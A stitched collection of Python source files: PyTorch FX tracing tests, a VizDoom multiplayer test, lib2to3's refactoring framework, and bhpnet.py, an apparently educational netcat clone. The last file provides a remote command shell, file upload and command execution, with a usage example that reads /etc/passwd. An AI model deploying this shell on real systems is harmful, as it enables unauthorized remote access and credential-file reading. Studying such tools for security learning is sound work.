UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable objects such as modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# inspect.signature raises ValueError when there is no signature or the object is unsupported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
test_vizdoom_multiplayer.py
|
import time
import unittest
from multiprocessing import Process
from unittest import TestCase
from multi_sample_factory.envs.env_utils import vizdoom_available
from multi_sample_factory.utils.utils import log, AttrDict
@unittest.skipUnless(vizdoom_available(), 'Please install VizDoom to run a full test suite')
class TestDoom(TestCase):
@staticmethod
def make_standard_dm(env_config):
from multi_sample_factory.envs.doom.doom_utils import make_doom_env
from multi_sample_factory.envs.tests.test_envs import default_doom_cfg
cfg = default_doom_cfg()
cfg.env_frameskip = 2
env = make_doom_env('doom_deathmatch_full', cfg=cfg, env_config=env_config)
env.skip_frames = cfg.env_frameskip
return env
@staticmethod
def doom_multiagent(make_multi_env, worker_index, num_steps=1000):
env_config = AttrDict({'worker_index': worker_index, 'vector_index': 0, 'safe_init': False})
multi_env = make_multi_env(env_config)
obs = multi_env.reset()
visualize = False
start = time.time()
for i in range(num_steps):
actions = [multi_env.action_space.sample()] * len(obs)
obs, rew, dones, infos = multi_env.step(actions)
if visualize:
multi_env.render()
if i % 100 == 0 or any(dones):
log.info('Rew %r done %r info %r', rew, dones, infos)
if all(dones):
multi_env.reset()
took = time.time() - start
log.info('Took %.3f seconds for %d steps', took, num_steps)
log.info('Server steps per second: %.1f', num_steps / took)
log.info('Observations fps: %.1f', num_steps * multi_env.num_agents / took)
log.info('Environment fps: %.1f', num_steps * multi_env.num_agents * multi_env.skip_frames / took)
multi_env.close()
def test_doom_multiagent(self):
self.doom_multiagent(self.make_standard_dm, worker_index=0)
def test_doom_multiagent_parallel(self):
num_workers = 16
workers = []
for i in range(num_workers):
log.info('Starting worker #%d', i)
worker = Process(target=self.doom_multiagent, args=(self.make_standard_dm, i, 200))
worker.start()
workers.append(worker)
time.sleep(0.01)
for i in range(num_workers):
workers[i].join()
|
refactor.py
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
from __future__ import with_statement
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import os
import sys
import logging
import operator
import collections
import io
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_utils as bu
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fixer_dir = os.path.dirname(pkg.__file__)
fix_names = []
for name in sorted(os.listdir(fixer_dir)):
if name.startswith("fix_") and name.endswith(".py"):
if remove_prefix:
name = name[4:]
fix_names.append(name[:-3])
return fix_names
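# Hedged example: for a fixer package whose directory contains fix_dict.py and
# fix_print.py, get_all_fix_names(pkg) returns ['dict', 'print']; with
# remove_prefix=False it returns ['fix_dict', 'fix_print'].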
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
# NodePatterns must either have no type and no content
# or a type and content -- so they don't get any farther
# Always return leaves
if pat.type is None:
raise _EveryNode
return set([pat.type])
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(pygram.python_grammar.symbol2number.values(),
pygram.python_grammar.tokens):
head_nodes[node_type].extend(every)
return dict(head_nodes)
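# Hedged illustration: a fixer whose pattern must start with, say, a NAME token is
# filed under head_nodes[token.NAME]; fixers whose pattern can match anywhere
# (signalled by _EveryNode) are appended to every entry, so looking up a node's
# type yields all fixers that could possibly apply at that node.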
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [pkg_name + "." + fix_name
for fix_name in get_all_fix_names(pkg_name, False)]
def _identity(obj):
return obj
if sys.version_info < (3, 0):
import codecs
_open_with_encoding = codecs.open
# codecs.open doesn't translate newlines sadly.
def _from_system_newlines(input):
return input.replace("\r\n", "\n")
def _to_system_newlines(input):
if os.linesep != "\n":
return input.replace("\n", os.linesep)
else:
return input
else:
_open_with_encoding = open
_from_system_newlines = _identity
_to_system_newlines = _identity
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset((token.NEWLINE, tokenize.NL, token.COMMENT))
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
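# Hedged usage example: _detect_future_features scans only the module prologue,
# so for source text like
#   "from __future__ import (division, print_function)\n"
# it returns frozenset({'division', 'print_function'}); scanning stops at the
# first token that is neither a docstring nor part of a __future__ import.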
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {"print_function" : False,
"write_unchanged_files" : False}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: a dict with configuration.
explicit: a list of fixers to run even if they are explicit.
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
if self.options["print_function"]:
self.grammar = pygram.python_grammar_no_print_statement
else:
self.grammar = pygram.python_grammar
        # When this is True, the refactor*() methods will call write_file() for
        # files processed even if they were not changed during refactoring,
        # provided the refactor method's write parameter was True.
self.write_unchanged_files = self.options.get("write_unchanged_files")
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(self.grammar,
convert=pytree.convert,
logger=self.logger)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX):]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name))
fixer = fix_class(self.options, self.fixer_log)
if fixer.explicit and self.explicit is not True and \
fix_mod_path not in self.explicit:
self.log_message("Skipping implicit fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if (not name.startswith(".") and
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except IOError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with _open_with_encoding(filename, "r", encoding=encoding) as f:
return _from_system_newlines(f.read()), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if self.write_unchanged_files or output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if self.write_unchanged_files or (tree and tree.was_changed):
# The [:-1] is to take off the \n we added earlier
self.processed_file(str(tree)[:-1], filename,
write=write, encoding=encoding)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if self.write_unchanged_files or output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if self.write_unchanged_files or (tree and tree.was_changed):
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
#use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
#sort by depth; apply fixers from bottom(of the AST) to top
match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
if fixer.keep_line_order:
#some fixers(eg fix_imports) must be applied
#with the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except ValueError:
# this node has been cut off from a
# previous transformation ; skip
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
#new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
if not fxr in match_set:
match_set[fxr]=[]
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(self, new_text, filename, old_text=None, write=False,
encoding=None):
"""
Called when a file has been refactored and there may be changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
if not self.write_unchanged_files:
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
then rewrites the file; the latter is only done if the write option is
set.
"""
try:
f = _open_with_encoding(filename, "w", encoding=encoding)
except os.error as err:
self.log_error("Can't create %s: %s", filename, err)
return
try:
f.write(_to_system_newlines(new_text))
except os.error as err:
self.log_error("Can't write %s: %s", filename, err)
finally:
f.close()
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(keepends=True):
lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif (indent is not None and
(line.startswith(indent + self.PS2) or
line == indent + self.PS2.rstrip() + "\n")):
block.append(line)
else:
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error("Can't parse docstring in %s line %s: %s: %s",
filename, lineno, err.__class__.__name__, err)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(keepends=True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[:lineno-1], new[lineno-1:]
assert clipped == ["\n"] * (lineno-1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix):]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False,
num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [multiprocessing.Process(target=self._child)
for i in range(num_processes)]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(items, write,
doctests_only)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
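# Minimal usage sketch (added comment, not from the original module); it
# assumes the standard lib2to3 package layout:
#
#     from lib2to3.refactor import RefactoringTool, get_fixers_from_package
#
#     fixers = get_fixers_from_package("lib2to3.fixes")
#     tool = RefactoringTool(fixers)
#     tree = tool.refactor_string("print 'hello'\n", "<example>")
#     print(str(tree))  # e.g. print('hello')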
|
bhpnet.py
|
import sys
import socket
import getopt
from threading import Thread
import subprocess
# define some global variables
LISTEN = False
COMMAND_SHELL = False
UPLOAD = False
EXECUTE = ""
TARGET = "" # localhost
UPLOAD_DEST = ""
PORT = 0
def run_command(command):
# run the command and get the output back
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
output = b"Failed to execute command.\r\n"
# send the output back to the client
return output
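# Illustrative note (added comment, not from the original script):
# check_output returns the command's stdout as bytes, e.g. on a POSIX shell
# run_command("echo hi") -> b'hi\n'; the b"Failed to execute command.\r\n"
# fallback keeps the return type consistent when the command fails.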
def client_handler(client_socket):
global UPLOAD
global EXECUTE
global COMMAND_SHELL
# check for upload
if len(UPLOAD_DEST):
# read in all of the bytes and write to our destination
file_buffer = ""
# keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
with open(UPLOAD_DEST, "wb") as file_descriptor:
file_descriptor.write(file_buffer)
# acknowledge that we wrote the file out
client_socket.send("Successfully saved file to {}\r\n".format(UPLOAD_DEST))
# check for command execution
if len(EXECUTE):
# run the command
output = run_command(EXECUTE)
        client_socket.send(output)
# now go into another loop if a command shell was requested
if COMMAND_SHELL:
while True:
# show a simple prompt
client_socket.send("<BHP:#> ".encode('utf-8'))
# now we receive until we see a linefeed (ENTER key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024).decode("utf-8")
# we have a valid command so execute it and send back the results
response = run_command(cmd_buffer)
# send back the response
client_socket.send(response)
def server_loop():
global TARGET
global PORT
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Listen on all interfaces if no target is defined
if not len(TARGET):
print("Server listening on all interfaces")
TARGET = ""
server.bind((TARGET, PORT))
server.listen(5)
while True:
print("Waiting for connection...")
client_socket, addr = server.accept()
print("Server starting @ {}".format(addr))
# spin off a thread to handle our new client
client_thread = Thread(target=client_handler, args=(client_socket,))
            client_thread.start()
except socket.error as err:
print("{0} Server Exception! Exiting.".format(str(err)))
except OSError as err:
print("Server OS error: {0}".format(err))
except Exception as inst:
print(type(inst))
print(inst)
except:
print("Unknown Server Exception! Exiting.")
finally:
# close the connection
server.close()
sys.exit(0)
# if we don't listen we are a client....make it so.
def client_sender():
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((TARGET, PORT))
print("Client connected")
while True:
# wait for data received from the server
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data.decode("utf-8")
if recv_len < 4096:
break
print(response)
# wait for input from the user
buffer = input()
buffer += "\n"
# send data to the server
client.send(buffer.encode('utf-8'))
except socket.error as err:
print("{0} Client Exception! Exiting.".format(str(err)))
except OSError as err:
print("Client OS error: {0}".format(err))
except Exception as inst:
print(type(inst))
print(inst)
except:
print("Unknown Client Exception! Exiting.")
finally:
# close the connection
client.close()
sys.exit(0)
def usage():
"""Prints the usage and options of the script then terminates the script"""
print("")
print("Netcat Replacement")
print("")
print("Usage: bhpnet.py -t target_host -p port")
print("-l --listen : listen on [host]:[port] for incoming connections")
print("-e --execute=file_to_run : execute the given file upon receiving a connection")
print("-c --command : initialize a command shell")
print("-u --upload=destination : upon receiving connection upload a file and write to [destination]")
print("")
print("Examples:")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -c")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"")
